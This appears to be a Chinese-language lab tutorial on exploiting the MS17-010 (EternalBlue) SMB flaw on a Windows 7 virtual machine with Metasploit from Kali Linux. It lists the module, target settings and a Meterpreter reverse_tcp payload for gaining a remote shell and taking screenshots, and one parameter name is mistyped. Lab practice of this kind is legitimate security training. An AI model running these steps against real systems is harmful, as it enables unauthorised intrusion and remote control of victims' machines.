利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程（永恒之蓝）

利用metasploit(MSF)对windows 7的ms17-010漏洞进行攻击过程（永恒之蓝）

1.实验环境

  虚拟机里面配置 kali 和 win7 在同一网段下，这里我设置的10.10.10.0/24：
  Kali linux  2019（10.10.10.131）
  Windows 7 X64 （10.10.10.130）
       环境链接：[密码 :b79j](https://pan.baidu.com/s/1JcYgJ8SgiwUXoIZhgakSnw)

2.漏洞介绍

  Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

3.攻击过程

1.ping 命令连通性测试


可以ping通，如果ping 130 不通，看下win7 是不是开了防火墙

2. Kali 攻击步骤
1.攻击模块 msf : msfconsole

2.利用模块查询 search ms17_010

利用针对 win 7 的模块: use exploit/windows/smb/ms17_010_eternalblue。
3.攻击参数配置
主要配置 :
攻击目标 ：set rhosts 10.10.10.130
执行攻击：exploit

开始攻击得到shell ！攻击成功

4.另一种方式：设置Meterpreter payload后在进行攻击

 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力，此模块包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 

只需要比上一步多一条配置：set payload windows/x64/meterpreter/reverse_tcp

执行成功：

阔以进行各种有意思的操作了：screenshot 屏幕截图等

get 屏幕截图：

5.Tips
如果执行不成功，可以尝试 修改下端口在尝试

set slport 22254[随便设置不常用的端口]